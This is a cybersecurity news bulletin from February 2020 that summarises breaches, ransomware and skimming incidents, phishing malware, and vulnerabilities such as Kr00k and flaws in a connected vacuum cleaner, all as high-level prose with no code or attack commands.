Cyber Security Malware Phishing Ransomware Spearphishing

CloudSEK Daily Threat Bulletin – 26th February 2020

Round Up of Major Breaches and Scams

Law enforcement partner Clearview notifies customers of breach

Law enforcement partner Clearview has notified its customers of a breach that exposed the list of customers, their accounts, and their searches. The facial recognition platform, which is solely for law enforcement agencies, has purportedly collected ~3 billion facial images. Clearview maintains that their servers were not accessed and that the flaw, which made the intrusion possible, has been patched. The leak is significant because the company has so far refused to share its client list.

Round Up of Major Malware and Ransomware Incidents

DoppelPaymer attacks Bretagne Télécom by exploiting Citrix flaw

Threat actors behind DoppelPaymer launched a ransomware attack on French Cloud hosting company Bretagne Télécom, asking for a ransom of 35 bitcoins (~$330K). The company announced that the attackers exploited the Citrix vulnerability CVE-2019-19781 to drop the ransomware payload. DoppelPaymer admitted that the attack was launched in the 1st half of January 2020. However, Bretagne Télécom was able to restore their customers’ data from backups. Though the company has denied any data leak, the attackers have uploaded a few samples on their website.

New malware ForeLord used by Iranian APT group to run phishing campaigns

Researchers have uncovered what appears to be, a spear-phishing campaign run by Iranian APT group Cobalt Ulster, using a new malware ForeLord. The emails targeted organizations in Turkey, Jordan, Iraq, Georgia and Azerbaijan. Though carrying a new malware, the emails itself are quite generic. Victims are asked to open a ZIP file that contains a malicious excel document, which instructs the user to ‘enable content.’ This disables the affected system’s security controls and runs the malicious code. Once installed on the system, the malware drops tools to steal credential, tests them, and creates a reverse SSL tunnel.

Reading Municipal Light Department targeted by ransomware attack

Massachusetts electric utility: Reading Municipal Light Department (RMLD), which serves 68,000 residents, announced that it was targeted by a ransomware attack that was discovered on 21st February 2020. There is no evidence that the attack affected the electricity supply or that any customer data was compromised. There is still no information on the type of ransomware or how the attack was carried out.

Over 30 months 18 skimmers targeted Reprint Mint photo store

Reprint Mint photo store, an online printing platform that prints the cover of ESPN sports magazine, has been targeted by skimmers that steal payment card data. At least 18 skimmers have been discovered since August 2017. And at certain times, more than 1 skimmer was found to be active, indicating that multiple attackers were targeting the site. The latest skimmers were installed on 23rd January 2020 and continues to run on the site.

Round Up of Major Vulnerabilities and Patches

Kr00k flaw made 1 billion Wi-Fi capable devices vulnerable to attacks

Before it was patched, the Kr00k (CVE-2019-15126) vulnerability could have exploited to wheedle sensitive information from wireless communications, from > 1 billion Wi-Fi capable devices. The flaw, which impacts Broadcom and Cypress Wi-Fi chips, made devices use an all-zero encryption key to encrypt a portion of a user’s communications. Following which, an attacker could decrypt wireless network packets transmitted by the affected devices. Broadcom and Cypress have patched the flaw.

6 flaws have been found in connected vacuum cleaner Ironpie M6

6 flaws have been found in connected vacuum cleaner Ironpie M6 which comes with a mobile app and a security camera. The vulnerabilities are found in the app and its connectivity protocol and can be exploited to launch denial of service (DoS) attacks and to view a user’s home via the security camera. The most severe of the vulnerabilities, can be exploited to access video streams from any device, anywhere in the world. Since these vulnerabilities have not been patched, the only option is for users to cover the camera or disable the device’s access to Wi-Fi.

Leave a Reply

Your email address will not be published. Required fields are marked *